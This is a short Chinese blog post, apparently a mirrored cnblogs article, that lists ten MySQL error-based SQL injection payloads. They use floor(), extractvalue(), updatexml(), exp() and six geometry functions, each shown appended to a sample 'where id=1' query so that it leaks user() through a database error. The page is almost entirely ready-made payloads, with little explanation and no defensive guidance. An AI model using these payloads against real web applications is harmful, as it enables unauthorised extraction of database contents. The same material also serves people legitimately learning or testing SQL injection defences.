zoukankan      html  css  js  c++  java
  • 十种常见的报错注入

    1.floor()
    
    select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
    
    2.extractvalue()
    
    select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
    
    3.updatexml()
    
    select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
    
    4.geometrycollection()
    
    select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
    
    5.multipoint()
    
    select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
    
    6.polygon()
    
    select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
    
    7.multipolygon()
    
    select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
    
    8.linestring()
    
    select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
    
    9.multilinestring()
    
    select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
    
    10.exp()
    
    select * from test where id=1 and exp(~(select * from(select user())a));
    
    
  • 相关阅读:
    软件需求与分析课堂讨论一
    架构漫谈读后感
    Android Studio AVD中文输入法安装
    软件体系结构课后作业01
    寒假阅读笔记六
    寒假阅读笔记五
    寒假阅读笔记三
    寒假阅读笔记二
    寒假阅读笔记一
    mysql绿色版的安装
  • 原文地址:https://www.cnblogs.com/nul1/p/12567508.html
Copyright © 2011-2022 走看看